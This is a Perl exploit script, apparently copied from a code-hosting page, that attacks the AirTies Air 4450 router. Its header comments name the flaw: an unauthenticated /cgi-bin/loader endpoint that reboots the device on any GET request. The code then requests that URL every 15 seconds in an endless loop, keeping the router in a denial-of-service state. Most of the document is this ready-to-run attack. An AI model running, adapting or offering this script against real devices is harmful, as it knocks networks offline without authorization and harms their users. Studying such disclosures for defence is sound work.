42 lines
No EOL
1.6 KiB
Perl
Executable file
42 lines
No EOL
1.6 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
# Title: AirTies-4450 Unauthorized Remote Reboot [DoS].
|
|
# Type: hardware
|
|
# Tested on firmware: AirTies_Air4450_RU_FW_1.1.2.18.bin
|
|
#
|
|
# Author: rigan - imrigan [sobachka] gmail.com
|
|
#
|
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
|
#
|
|
# The description of the device from a site of the vendor:
|
|
#
|
|
# With its Access Point and Router functionality, the Air 4450 provides wireless Internet access over
|
|
# ADSL and Cable modems. Air 4450 uses 802.11n technology providing wireless data transfer
|
|
# rates of up to 300 Mbps. Thus, you can transfer data, watch videos or upload your pictures to the
|
|
# Internet at “N-speed”. Providing 6 times faster wireless communications compared to earlier
|
|
# technologies, and 4 times greater wireless range through use of MIMO technology*, Air 4450 has
|
|
# been developed to meet all your wireless needs.
|
|
#
|
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
|
#
|
|
# The vulnerability:
|
|
#
|
|
# http://192.168.1.1/cgi-bin/loader - This cgi script allows to reboot the device via GET request.
|
|
#
|
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
|
use LWP::Simple;
|
|
print "[*] AirTies Air-4450 Remote Dos Exploit\n";
|
|
if (@ARGV != 2){
|
|
print "[*] Usage: perl airdos.pl ip port \n";
|
|
exit(1);
|
|
}
|
|
while (@ARGV > 0){
|
|
$ip = shift(@ARGV);
|
|
$port = shift(@ARGV);
|
|
}
|
|
$url = "http://".$ip.":".$port."/cgi-bin/".loader;
|
|
print "[*] DoS ...............................\n";
|
|
while(1){
|
|
get($url);
|
|
sleep(15);
|
|
} |